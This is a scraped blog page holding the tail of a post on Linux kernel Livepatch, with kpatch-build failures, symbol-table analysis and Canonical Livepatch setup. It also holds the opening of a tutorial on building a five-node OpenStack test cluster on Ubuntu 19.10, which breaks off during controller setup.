<a href="https://github.com/torvalds/linux/commit/5a8d75a1b8c99bdc926ba69b7b7dbe4fae81a5af">block: fix bio_will_gap() for first bvec with offset</a>.</p>
<p>The important part is the three function prototypes in each changed function:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>-static inline bool bio_will_gap(struct request_queue *q, struct bio *prev,
- struct bio *next)
+static inline bool bio_will_gap(struct request_queue *q,
+ struct request *prev_rq,
+ struct bio *prev,
+ struct bio *next)
static inline bool req_gap_back_merge(struct request *req, struct bio *bio)
static inline bool req_gap_front_merge(struct request *req, struct bio *bio)
</code></pre></div></div>
<p>Inlined functions. Sometimes these will work, as the callers will just embed
the code in them. Most of the time they won’t though.</p>
<p>The thing is, the kernel redefines the meaning of <code class="language-plaintext highlighter-rouge">inline</code> in
<code class="language-plaintext highlighter-rouge">include/linux/compiler_types.h</code>:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#if !defined(CONFIG_OPTIMIZE_INLINING)
#define inline inline __attribute__((__always_inline__)) __gnu_inline \
__inline_maybe_unused notrace
#else
#define inline inline __gnu_inline \
__inline_maybe_unused notrace
#endif
</code></pre></div></div>
<p>We see that if you select <code class="language-plaintext highlighter-rouge">inline</code>, you also get <code class="language-plaintext highlighter-rouge">notrace</code>. Only tracable
functions can be Livepatched as we know, meaning that this is a dead end
if you are not using tools like <code class="language-plaintext highlighter-rouge">kpatch-build</code>. Most patches like this will
mostly error out with <code class="language-plaintext highlighter-rouge">kpatch-build</code> too.</p>
<h2 id="example-two-gcc-optimisations">Example Two: GCC Optimisations</h2>
<p>The next bug is a neat little Null pointer dereference if you have the sysctl
<code class="language-plaintext highlighter-rouge">kernel.core_pattern</code> set to “|” and run a program which crashes.</p>
<p>You can read all about it here:</p>
<p><a href="https://bugs.launchpad.net/ubuntu/+source/linux/+bug/1863086">unkillable process (kernel NULL pointer dereference)</a></p>
<p>There’s a patch made by Sudip Mukherjee which was more elegant than the one I put
forward in the process of getting mainlined now. You can see it here:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>diff --git a/fs/coredump.c b/fs/coredump.c
index f8296a82d01d..408418e6aa13 100644
--- a/fs/coredump.c
+++ b/fs/coredump.c
@@ -211,6 +211,8 @@ static int format_corename(struct core_name *cn, struct coredump_params *cprm,
return -ENOMEM;
(*argv)[(*argc)++] = 0;
++pat_ptr;
+ if (!(*pat_ptr))
+ return -ENOMEM;
}
/* Repeat as long as we have more pattern to process and more output
</code></pre></div></div>
<p>Now, if we run <code class="language-plaintext highlighter-rouge">kpatch-build</code> over this:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ kpatch/kpatch-build/kpatch-build -t vmlinux --vmlinux /lib/debug/boot/vmlinux-5.4.0-24-generic ~/corename.patch
Using cache at /home/matthew/.kpatch/src
Testing patch file(s)
Reading special section data
readelf: Error: LEB value too large
readelf: Error: LEB value too large
Building original source
Building patched source
Extracting new and modified ELF sections
coredump.o: changed function: do_coredump
/home/matthew/work/kernel/kpatch/kpatch-build/create-diff-object: ERROR: coredump.o: find_local_syms: 175: find_local_syms for coredump.c: couldn't find in vmlinux symbol table
ERROR: 1 error(s) encountered. Check /home/matthew/.kpatch/build.log for more details.
</code></pre></div></div>
<p>It fails! Why does it say the changed function was <code class="language-plaintext highlighter-rouge">do_coredump()</code>, when the
above patch clearly patches <code class="language-plaintext highlighter-rouge">format_corename()</code>? There are no inlined functions
here.</p>
<p>To get some answers, we need to look at the vmlinux binaries to see what
symbols are exported.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ readelf -s /lib/debug/boot/vmlinux-5.4.0-24-generic
...
29993: 0000000000000000 0 FILE LOCAL DEFAULT ABS coredump.c
29994: ffffffff8247f938 0 NOTYPE LOCAL DEFAULT 13 __ksymtab_dump_emit
29995: ffffffff824a80eb 10 OBJECT LOCAL DEFAULT 17 __kstrtab_dump_emit
29996: ffffffff8247f95c 0 NOTYPE LOCAL DEFAULT 13 __ksymtab_dump_skip
29997: ffffffff824a80e1 10 OBJECT LOCAL DEFAULT 17 __kstrtab_dump_skip
29998: ffffffff8247f92c 0 NOTYPE LOCAL DEFAULT 13 __ksymtab_dump_align
29999: ffffffff824a80d6 11 OBJECT LOCAL DEFAULT 17 __kstrtab_dump_align
30000: ffffffff8247f974 0 NOTYPE LOCAL DEFAULT 13 __ksymtab_dump_truncate
30001: ffffffff824a80c8 14 OBJECT LOCAL DEFAULT 17 __kstrtab_dump_truncate
30002: ffffffff813610b0 156 FUNC LOCAL DEFAULT 1 umh_pipe_setup
30003: ffffffff81361150 208 FUNC LOCAL DEFAULT 1 zap_process
30004: ffffffff813612e0 100 FUNC LOCAL DEFAULT 1 expand_corename.isra.0
30005: ffffffff827144c0 4 OBJECT LOCAL DEFAULT 24 core_name_size
30006: ffffffff81361350 195 FUNC LOCAL DEFAULT 1 cn_vprintf
30007: ffffffff81361420 106 FUNC LOCAL DEFAULT 1 cn_printf
30008: ffffffff81361490 247 FUNC LOCAL DEFAULT 1 cn_esc_printf
30009: ffffffff82d3f560 4096 OBJECT LOCAL DEFAULT 54 zeroes.62762
30010: ffffffff81361660 1383 FUNC LOCAL DEFAULT 1 format_corename.isra.0
30011: ffffffff81361bd0 36 FUNC LOCAL DEFAULT 1 kmalloc_array.constprop.0
30012: ffffffff82d40560 0 OBJECT LOCAL DEFAULT 54 __key.10435
30013: ffffffff82d40560 4 OBJECT LOCAL DEFAULT 54 core_dump_count.62719
30014: ffffffff81362730 56 FUNC LOCAL DEFAULT 1 do_coredump.cold
30015: ffffffff82079530 12 OBJECT LOCAL DEFAULT 7 __func__.62732
...
</code></pre></div></div>
<p>Next, the freshly built vmlinux:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ readelf -s ~/.kpatch/src/vmlinux
...
92711: 0000000000000000 0 FILE LOCAL DEFAULT ABS coredump.c
92712: ffffffff8248f918 0 NOTYPE LOCAL DEFAULT 97899 __ksymtab_dump_emit
92713: ffffffff824b80cb 10 OBJECT LOCAL DEFAULT 97903 __kstrtab_dump_emit
92714: ffffffff8248f93c 0 NOTYPE LOCAL DEFAULT 97899 __ksymtab_dump_skip
92715: ffffffff824b80c1 10 OBJECT LOCAL DEFAULT 97903 __kstrtab_dump_skip
92716: ffffffff8248f90c 0 NOTYPE LOCAL DEFAULT 97899 __ksymtab_dump_align
92717: ffffffff824b80b6 11 OBJECT LOCAL DEFAULT 97903 __kstrtab_dump_align
92718: ffffffff8248f954 0 NOTYPE LOCAL DEFAULT 97899 __ksymtab_dump_truncate
92719: ffffffff824b80a8 14 OBJECT LOCAL DEFAULT 97903 __kstrtab_dump_truncate
92720: ffffffff814baff0 156 FUNC LOCAL DEFAULT 8647 umh_pipe_setup
92721: ffffffff81761a10 208 FUNC LOCAL DEFAULT 32162 zap_process
92722: ffffffff81761ba0 100 FUNC LOCAL DEFAULT 32166 expand_corename.isra.0
92723: ffffffff8276d518 4 OBJECT LOCAL DEFAULT 106303 core_name_size
92724: ffffffff81761c10 195 FUNC LOCAL DEFAULT 32168 cn_vprintf
92725: ffffffff81761ce0 106 FUNC LOCAL DEFAULT 32170 cn_printf
92726: ffffffff81761d50 247 FUNC LOCAL DEFAULT 32172 cn_esc_printf
92727: ffffffff83017f60 4096 OBJECT LOCAL DEFAULT 117495 zeroes.62762
92728: ffffffff82ec62d0 0 OBJECT LOCAL DEFAULT 116793 __key.10435
92729: ffffffff83018f60 4 OBJECT LOCAL DEFAULT 117496 core_dump_count.62719
92730: ffffffff81761f16 27 FUNC LOCAL DEFAULT 32178 do_coredump.cold
92731: ffffffff822adba0 12 OBJECT LOCAL DEFAULT 97893 __func__.62732
...
</code></pre></div></div>
<p>If you look closely, the original vmlinux has the following two symbols:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> 30010: ffffffff81361660 1383 FUNC LOCAL DEFAULT 1 format_corename.isra.0
30011: ffffffff81361bd0 36 FUNC LOCAL DEFAULT 1 kmalloc_array.constprop.0
</code></pre></div></div>
<p>While the built one does not! There are missing symbols in our freshly built
vmlinux binaries. This is likely down to the “ISRA” optimisation round which
GCC does. Maybe compiler flags are slightly different between builds. I am not
sure. All I do know, is that this patch has problems.</p>
<h2 id="limitations-in-livepatch">Limitations in Livepatch</h2>
<p>As we can see, there are some real limitations to which patches are suitable for
Livepatch. This is probably the biggest reason why Livepatches are reserved for
security fixes only, since most normal fixes won’t work.</p>
<p>The best cheat sheet for what patches work is the <a href="https://github.com/dynup/kpatch/blob/master/doc/patch-author-guide.md">Patch Author Guide</a>
in the kpatch repository.</p>
<p>As soon as I can fix a real bug with Livepatch, I will write a follow up blogpost.</p>
<h1 id="installing-and-configuring-livepatch-on-ubuntu">Installing and Configuring Livepatch on Ubuntu</h1>
<p>Interested in using Livepatch in your production environment, but don’t want to
navigate all the complexity behind researching compatible patches, writing or
generating Livepatch modules, testing for regressions or scaling deployment?</p>
<p>Well, you can use the <a href="https://ubuntu.com/livepatch">Canonical Livepatch Service</a>.</p>
<p>The Canonical Livepatch Service is easy to set up, and automatically delivers
critical security fixes to your machines. These Livepatches have been thoroughly
tested and are safe to use.</p>
<p>You can find a list of supported distribution releases and kernel versions
on the <a href="https://wiki.ubuntu.com/Kernel/Livepatch">Livepatch Wiki page</a>.</p>
<p>The rule of thumb is that Livepatch is available for LTS GA kernels, and HWE
kernels which are from the next LTS GA kernel.</p>
<p>So for example, 4.4 GA kernel on Xenial, or the 4.15 HWE kernel on xenial, since
it was Bionic’s GA kernel. Bionic will have 4.15 and soon, the 5.4 HWE kernel
from Focal.</p>
<p>The Canonical Livepatch service is pretty easy to set up. All you need to do is:</p>
<ol>
<li>Visit the <a href="https://auth.livepatch.canonical.com/">Canonical Livepatch Portal</a> to generate your API key.</li>
<li>Install the Livepatch system daemon with <code class="language-plaintext highlighter-rouge">$ sudo snap install canonical-livepatch</code></li>
<li>Setup Livepatch with the API key: <code class="language-plaintext highlighter-rouge">$ sudo canonical-livepatch enable <TOKEN></code></li>
</ol>
<p>You can try Livepatch for free for up to 3 machines, which is pretty neat if
you want to use it on your own personal PC or server. If you need to scale for your
production environment, then you can sign up for <a href="https://ubuntu.com/support">Ubuntu Advantage</a>
which includes the Canonical Livepatch Service.</p>
<p>The <a href="https://assets.ubuntu.com/v1/ef19ede0-Datasheet_Livepatch_AW_Web_30.07.18.pdf">Datasheet</a>
covers any more questions you might have, such as on-premise availability or
pricing.</p>
<p>So how do we tell if the Canonical Livepatch Service is working? Well, you
can run:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ canonical-livepatch status
last check: 1 minute ago
kernel: 4.4.0-168.197-generic
server check-in: succeeded
patch state: ✓ all applicable livepatch modules inserted
patch version: 65.1
</code></pre></div></div>
<p>We can also check dmesg, to see if the module has been inserted correctly:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>[ 234.112955] lkp_Ubuntu_4_4_0_168_197_generic_65: loading out-of-tree module taints kernel.
[ 234.113077] lkp_Ubuntu_4_4_0_168_197_generic_65: module verification failed: signature and/or required key missing - tainting kernel
[ 237.331850] livepatch: tainting kernel with TAINT_LIVEPATCH
[ 237.331852] livepatch: enabling patch 'lkp_Ubuntu_4_4_0_168_197_generic_65'
</code></pre></div></div>
<p>We can see that we are running patch version 65.1. What does that mean? How
do we see what is in each patch?</p>
<p>Well, you can sign up for the <a href="https://lists.ubuntu.com/mailman/listinfo/ubuntu-security-announce">Ubuntu Security Announce</a> mailing list. All
new Livepatches are announced here, under <code class="language-plaintext highlighter-rouge">[LSN-VERSION]</code> tags. For example,
the patch we just installed above is documented here:</p>
<p><a href="https://lists.ubuntu.com/archives/ubuntu-security-announce/2020-April/005391.html">[LSN-0065-1] Linux kernel vulnerability</a></p>
<p>Otherwise you can also browse the source code repositories.</p>
<ul>
<li><a href="https://git.launchpad.net/~ubuntu-livepatch/+git/xenial-livepatches/">Xenial Livepatch Source Code</a></li>
<li><a href="https://git.launchpad.net/~ubuntu-livepatch/+git/bionic-livepatches/">Bionic Livepatch Source Code</a></li>
</ul>
<p>If we have a look at the <a href="https://git.launchpad.net/~ubuntu-livepatch/+git/xenial-livepatches/tree/Ubuntu-4.4.0-168.197/Ubuntu-4.4.0-168.197.diff">Xenial 65.1 patch for 4.4.0-168-generic</a>, we have vmx fixes, mwifiex wifi driver fixes, btrfs
fixes, and i915 graphics fixes. We can also see that they are built with
<code class="language-plaintext highlighter-rouge">kpatch-build</code>: <a href="https://git.launchpad.net/~ubuntu-livepatch/+git/xenial-livepatches/tree/Ubuntu-4.4.0-168.197/Makefile">Makefile for Xenial 65.1 patch</a>.</p>
<p>Most users probably aren’t interested in what are in their Livepatches, but if
you are interested, feel free to review.</p>
<h1 id="conclusion">Conclusion</h1>
<p>Well, there we have it. We looked into how Livepatch works at a semi-technical
level, we implemented a few Livepatches of our own and got them working.</p>
<p>It’s a pity that I haven’t managed to make a Livepatch to fix a real bug just
yet, since I keep selecting fixes which aren’t compatible, but as soon as I find
one which is, I will write another blog post about it.</p>
<p>We also had a look at the Canonical Livepatch Service, and I was pretty happy
with how easy it is to operate, compared to the endless trouble of making these
modules yourself.</p>
<p>I think Livepatch is a very cool kernel technology, so keep an eye out on future
blog posts where I delve into it some more.</p>
<p>I hope you enjoyed the read, and as always, feel free to <a href="/about">contact me</a>.</p>
<p>Matthew Ruffell</p>Matthew RuffellOne of the more recent killer features implemented by most major Linux distros these days is the ability to patch the kernel while it is running, without the need for a reboot. While this may sound like sorcery for some, this is a very real feature, called Livepatch. Livepatch uses ftrace in new and interesting ways, by patching in calls at the beginning of existing functions to new patched functions, delivered as kernel modules. This lets you update and fix bugs on the fly, although its use is typically reserved for security critical fixes only. The whole concept is extremely interesting, so today we will look into what Livepatch is, how it is implemented across several distros, we will write some Livepatches of our own, and look at how Livepatch works in Ubuntu for end users.Deploying an OpenStack Cluster in Ubuntu 19.102020-02-13T00:00:00+00:002020-02-13T00:00:00+00:00https://ruffell.nz/programming/writeups/2020/02/13/deploying-a-openstack-cluster-in-ubuntu-19.10<p>The next article in my series of learning about cloud computing is tackling one
of the larger and more widely used cloud software packages - OpenStack.</p>
<p>OpenStack is a service which lets you provision and manage virtual machines
across a pool of hardware which may have differing specifications and vendors.</p>
<p>Today, we will be deploying a small five node OpenStack cluster in Ubuntu 19.10
Eoan Ermine, so follow along, and let’s get this cluster running.</p>
<p><img src="/assets/images/2020_000.png" alt="hero" /></p>
<p>We will cover what OpenStack is, the services it is comprised of, how to deploy
it, and using our cluster to provision some virtual machines.</p>
<p>Let’s get started.</p>
<!--more-->
<h1 id="what-is-openstack">What is OpenStack?</h1>
<p>As mentioned previously, OpenStack is a service which lets you provision and
manage virtual machines running across a pool of hardware that provide
compute, networking or storage resources. This pool of hardware can be made up
with differing specifications or multiple vendors, or even different geographical
locations. OpenStack is the glue which connects these resources together in a
easy to use, secure, cohesive system for provisioning virtual machines to
public or private cloud environments.</p>
<h1 id="what-are-openstacks-main-usages">What are OpenStacks Main Usages?</h1>
<p>OpenStacks primary usage is to provide a platform for cloud computing. This can
be in the form of public or private clouds. Public clouds are open to the
public and anyone can sign up for an account on, and private clouds are typically
private and local to a single company.</p>
<p>OpenStack allows users to provision virtual machines of various specifications,
with various choices of operating systems in various geographical locations, or
Availability Zones. OpenStack gives the users the ability to build virtual
networks for their virtual machines to be connected to, and to specify how
those networks operate with allowing easy configuration of virtual routers,
switches and the like.</p>
<p>OpenStack takes care of all storage requirements, and offers backends for
block and object storage, which can be utilised by the virtual machines
themselves, and the applications running ontop of it.</p>
<h1 id="openstack-architecture">OpenStack Architecture</h1>
<p>Like Ceph, OpenStack is not a monolithic program. Instead, it is comprised of a
set of specialised individual services, which are further split into a set of
sub-services. The best way to grasp the complexity of OpenStack is by looking
at an example <a href="https://docs.openstack.org/install-guide/get-started-logical-architecture.html">logical architecture diagram</a> provided in the
<a href="https://docs.openstack.org">OpenStack Documentation</a>.</p>
<p><img src="/assets/images/2020_001.png" alt="logical architecture" /></p>
<p>We are going to focus on the following core services:</p>
<ul>
<li><a href="https://docs.openstack.org/horizon/latest/"><strong>Horizon</strong></a>, a central dashboard
where users can manage resource and provision virtual machines.</li>
<li><a href="https://docs.openstack.org/keystone/latest/"><strong>Keystone</strong></a>, an identity and
authentication service which implements fine tuned permissions and access control.</li>
<li><a href="https://docs.openstack.org/nova/latest/"><strong>Nova</strong></a>, a compute engine which
hosts the virtual machines being provisioned.</li>
<li><a href="https://docs.openstack.org/neutron/latest/"><strong>Neutron</strong></a>, which implements
networking as a service, which can create virtual networks and virtual network
interfaces that can be attached to virtual machines managed by nova.</li>
<li><a href="https://docs.openstack.org/glance/latest/"><strong>Glance</strong></a>, an image service
which stores, fetches and provides operating system images for the virtual
machines.</li>
<li><a href="https://docs.openstack.org/cinder/latest/"><strong>Cinder</strong></a>, a block storage
service which delivers highly available and fault tolerant block storage for use
with virtual machines.</li>
<li><a href="https://docs.openstack.org/swift/latest/"><strong>Swift</strong></a>, a object storage
backend which consumes and stores single objects quickly and efficiently.</li>
</ul>
<p>Each of these core services appear on the example logical architecture diagram
encased within dotted lines. These lines show the border between what we
consider the logical unit for a service, like nova, and the smaller sub-services
which nova is comprised of.</p>
<p>Every OpenStack service will have a API sub-service, which is the endpoint which
OpenStack services use to communicate with each other. Most OpenStack services
will also have its own database to store state and information required by the
sub-services.</p>
<p>Otherwise, sub-services are specific to the service itself. If we look at Nova,
we see sub-services nova-scheduler, nova-console, nova-cert, nova-compute,
nova-consoleauth and nova-conductor. Each of there can communicate with other
sub-services if necessary, and use central resources, like the Nova database
and the work queue. Each of these sub-services are separated into their own
process, and can be stopped, started and restarted independently of the other
sub-services.</p>
<h1 id="architecture-of-the-cluster-we-will-build">Architecture of the Cluster We Will Build</h1>
<p>Today, we are going to deploy OpenStack on a small 5 node cluster which will be
made of virtual machines. I highly recommend you use a desktop computer for this
as we are going to need a lot of ram and disk space.</p>
<p><img src="/assets/images/2020_002.png" alt="deployment" /></p>
<p>We will have five machines and two networks. Our machines will be controller,
compute, block-storage, object-storage-1 and object-storage-2. The names are
fairly self explanatory, and we can see the services each will be running in
the diagram.</p>
<p>For the networks, we will have a management network and a provider network.
The management network will be used for administrative tasks, such as
OpenStack services communicating between themselves via their API endpoints.
The provider network is the virtual network that instances will have their
virtual NICs attached to.</p>
<p>Once the installation is done, we will be accessing the cluster through the
horizon web interface through the controller machine.</p>
<h1 id="deploying-the-cluster">Deploying the Cluster</h1>
<p>Okay, let’s get moving. Time to fire up some virtual machines and start
configuring our cluster.</p>
<h2 id="setting-up-internal-networks">Setting Up Internal Networks</h2>
<p>As mentioned previously, we will have two networks, the management network
and the provider network. I’m going to be using the defaults suggested in the
<a href="https://docs.openstack.org/install-guide/">OpenStack Installation Guide</a>
especially when it comes to the <a href="https://docs.openstack.org/install-guide/overview.html#networking-option-1-provider-networks">provider network</a>.</p>
<p>The networks and their CIDRs will be:</p>
<ul>
<li><strong>Management Network</strong> - 10.0.0.0/24</li>
<li><strong>Provider Network</strong> - 203.0.113.0/24</li>
</ul>
<p>These networks need to be created in your virtualisation software. I’m using
<code class="language-plaintext highlighter-rouge">virt-manager</code>, and you can do this by going to <code class="language-plaintext highlighter-rouge">Edit > Connection Details...</code>
then making a new virtual network.</p>
<p><img src="/assets/images/2020_003.png" alt="virtual network" /></p>
<p>These networks will be internal networks for now. We will also attach a normal
NAT network to our VMs while we get things up and running, but we will remove
this when we are done, to leave us with an isolated cluster.</p>
<p>Go ahead and make both the management and provider networks.</p>
<p><img src="/assets/images/2020_004.png" alt="network pane" /></p>
<p>When you are done, you will have three networks.</p>
<h2 id="install-ubuntu-server">Install Ubuntu Server</h2>
<p>Create five virtual machines with the following specs:</p>
<ul>
<li><strong>controller</strong>: 4gb ram, 1 vcpu, 10gb disk.</li>
<li><strong>compute</strong>: 4gb ram, 1 vcpu, 10gb disk.</li>
<li><strong>block-storage</strong>: 4gb ram, 1 vcpu, 10gb disk, 10gb disk.</li>
<li><strong>object-storage-1</strong>: 4gb ram, 1 vcpu, 10gb disk, 10gb disk, 10gb disk.</li>
<li><strong>object-storage-2</strong>: 4gb ram, 1 vcpu, 10gb disk, 10gb disk, 10gb disk.</li>
</ul>
<p>If you are low on ram or disk space, you can shave some specs off the block
storage and object storage machines.</p>
<p>Attach the management network to all the machines. Attach the provider network
to the controller and compute machines. Probably best to do this before you
start the installation.</p>
<p>Go ahead and install Ubuntu 19.10 Eoan Ermine Server on them:</p>
<p><img src="/assets/images/2020_005.png" alt="ubuntu server" /></p>
<p>Make sure to say yes to installing openssh-server when asked. We will be needing
it.</p>
<h2 id="configure-ubuntu-server">Configure Ubuntu Server</h2>
<p>After the install is done, we need to configure some networking on our fresh
installs.</p>
<h3 id="setting-up-machine-networking">Setting Up Machine Networking</h3>
<p>Nothing too fancy here, we are going to set up a static IP for our interfaces.</p>
<p>Recent versions of Ubuntu server use netplan for its networking, which can
take some getting used to. It’s okay though, its not hard.</p>
<p>If you go to <code class="language-plaintext highlighter-rouge">/etc/netplan</code>, there will be a file called <code class="language-plaintext highlighter-rouge">50-cloud-init.yaml</code>.</p>
<p>cloud-init will have pre-populated it with all current network interfaces:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code># This file is generated from information provided by
# the datasource. Changes to it will not persist across an instance.
# To disable cloud-init's network configuration capabilities, write a file
# /etc/cloud/cloud.cfg.d/99-disable-network-config.cfg with the following:
# network: {config: disabled}
network:
ethernets:
enp1s0:
dhcp4: true
enp2s0:
dhcp4: true
enp3s0:
dhcp4: true
version: 2
</code></pre></div></div>
<p>We want our management and provider networks to have static IP addresses, so the
first thing is to determine what these interfaces are.</p>
<p>If you run <code class="language-plaintext highlighter-rouge">ip addr</code>, you will see something like:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>1: lo:
inet 127.0.0.1/8 scope host lo
2: enp1s0:
inet 192.168.122.13/24 brd 192.168.122.255 scope global dynamic enp1s0
3: enp2s0:
inet 10.0.0.155/24 brd 10.0.0.255 scope global dynamic enp2s0
4: enp3s0:
inet 203.0.113.249/24 brd 203.0.113.255 scope global dynamic enp3s0
</code></pre></div></div>
<p>I cleaned up the output, since let’s face it, <code class="language-plaintext highlighter-rouge">ip addr</code> gives us information
overload, while <code class="language-plaintext highlighter-rouge">ifconfig</code> had nice output. Rest in peace <code class="language-plaintext highlighter-rouge">ifconfig</code>.</p>
<p>We see enp1s0 is the NAT network, enp2s0 is management network and enp3s0 is the
provider network.</p>
<p>Our nodes will have the following static IPs:</p>
<ul>
<li><strong>controller</strong>: management: 10.0.0.11, provider: 203.0.113.11</li>
<li><strong>compute</strong>: management: 10.0.0.21, provider: 203.0.113.21</li>
<li><strong>block-storage</strong>: management: 10.0.0.31</li>
<li><strong>object-storage-1</strong>: management: 10.0.0.41</li>
<li><strong>object-storage-2</strong>: management: 10.0.0.51</li>
</ul>
<p>So we need to edit our netplan configuration like this, for our controller:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code># This file is generated from information provided by
# the datasource. Changes to it will not persist across an instance.
# To disable cloud-init's network configuration capabilities, write a file
# /etc/cloud/cloud.cfg.d/99-disable-network-config.cfg with the following:
# network: {config: disabled}
network:
ethernets:
enp1s0:
dhcp4: true
enp2s0:
dhcp4: true
addresses: [10.0.0.11/24]
enp3s0:
dhcp4: true
addresses: [203.0.113.11/24]
version: 2
</code></pre></div></div>
<p>When we are done, we can apply the changes with:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo netplan apply
</code></pre></div></div>
<p>Reboot your machine, and when it comes back up, if we log in, we should see
our static IPs in place:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Welcome to Ubuntu 19.10 (GNU/Linux 5.3.0-26-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Sun 26 Jan 2020 09:48:36 PM UTC
System load: 0.98 Users logged in: 0
Usage of /: 41.8% of 9.78GB IP address for enp1s0: 192.168.122.13
Memory usage: 4% IP address for enp2s0: 10.0.0.11
Swap usage: 0% IP address for enp3s0: 203.0.113.11
Processes: 131
0 updates can be installed immediately.
0 of these updates are security updates.
Last login: Sun Jan 26 21:39:04 2020 from 192.168.122.1
</code></pre></div></div>
<p>Not too bad at all! Now go and do the same for the rest of the machines.</p>
<h3 id="configure-the-hosts-file">Configure the Hosts File</h3>
<p>Edit /etc/hosts on all the machines and place the following inside it:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>10.0.0.11 controller
203.0.113.11 controller-api
10.0.0.21 compute
203.0.113.21 compute-api
10.0.0.31 block-storage
10.0.0.41 object-storage-1
10.0.0.51 object-storage-2
</code></pre></div></div>
<p>There will likely be an entry with the machine’s hostname at the top, that
redirects back to localhost. Something like <code class="language-plaintext highlighter-rouge">127.0.0.1 controller</code>. Make sure
to comment out this line, because we want <code class="language-plaintext highlighter-rouge">controller</code> to mean <code class="language-plaintext highlighter-rouge">10.0.0.11</code>
instead.</p>
<p>That should make things easier for us later on.</p>
<h3 id="set-up-ntp-for-stable-timekeeping">Set Up NTP For Stable Timekeeping</h3>
<p>It can be useful for all our boxes have an aligned time, since OpenStack
requires a consistent time across all machines. We will use
chrony, with the controller as the master NTP server.</p>
<p>On all machines, install <code class="language-plaintext highlighter-rouge">chrony</code>:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo apt install chrony
</code></pre></div></div>
<p>The controller will have internet access, so we will configure the machines
to connect to the controller for NTP.</p>
<p>On the controller, edit <code class="language-plaintext highlighter-rouge">/etc/chrony/chrony.conf</code> and place the following at
the end:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo vim /etc/chrony/chrony.conf
...
# Allow our internal networked machines access to our chrony server
allow 10.0.0.0/24
</code></pre></div></div>
<p>Now we can configure the other machines to connect to the controller for NTP.
For all the configured “pools”, we need to comment them out, and set the
<code class="language-plaintext highlighter-rouge">server</code> to be the controller instead.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo vim /etc/chrony/chrony.conf
...
# Comment out the default pools:
#pool ntp.ubuntu.com iburst maxsources 4
#pool 0.ubuntu.pool.ntp.org iburst maxsources 1
#pool 1.ubuntu.pool.ntp.org iburst maxsources 1
#pool 2.ubuntu.pool.ntp.org iburst maxsources 2
# Use the controller as the NTP master server
server controller iburst
</code></pre></div></div>
<p>Save. Once that is done, we need to restart chrony on all systems:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo systemctl restart chrony
</code></pre></div></div>
<p>We can check the other machines get their time from the controller with:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ chronyc sources
210 Number of sources = 1
MS Name/IP address Stratum Poll Reach LastRx Last sample
===============================================================================
^* controller 2 6 37 20 +20ns[ -214us] +/- 12ms
</code></pre></div></div>
<p>We should get something like this.</p>
<h3 id="installing-openstack-client-packages">Installing OpenStack Client Packages</h3>
<p>We will be using the python OpenStack client to deploy our cluster, so go ahead
and install it on all machines:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo apt install python3-openstackclient
</code></pre></div></div>
<h3 id="installing-a-database-on-the-controller">Installing a Database on the Controller</h3>
<p>We need to install a database on the controller, so let’s use mariadb:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo apt install mariadb-server python3-pymysql
</code></pre></div></div>
<p>Let’s put some basic configuration in it:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo vim /etc/mysql/mariadb.conf.d/99-openstack.cnf
[mysqld]
bind-address = 10.0.0.11
default-storage-engine = innodb
innodb_file_per_table = on
max_connections = 4096
collation-server = utf8_general_ci
character-set-server = utf8
</code></pre></div></div>
<p>Then we restart the service:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo systemctl restart mysql
</code></pre></div></div>
<p>All that’s left is to clear out the demo users and set a root database password:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo mysql_secure_installation
</code></pre></div></div>
<p>When asked for the root password, it will be blank. When we want to set a root
password, use something decent, but if your doing this for fun, like I am,
then it probably doesn’t matter too much. We will use <code class="language-plaintext highlighter-rouge">password123</code>.</p>
<p>From there, say yes to the defaults.</p>
<h3 id="installing-a-messaging-queue-on-the-controller">Installing a Messaging Queue on the Controller</h3>
<p>We also need a messaging queue on the controller, so let’s use rabbitmq.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo apt install rabbitmq-server
</code></pre></div></div>
<p>Let’s add a user:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo rabbitmqctl add_user openstack password123
Adding user "openstack" ...
</code></pre></div></div>
<p>And let the <code class="language-plaintext highlighter-rouge">openstack</code> user have all permissions to the queue:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo rabbitmqctl set_permissions openstack ".*" ".*" ".*"
Setting permissions for user "openstack" in vhost "/" ...
</code></pre></div></div>
<h3 id="installing-memcached-to-the-controller">Installing Memcached to the Controller</h3>
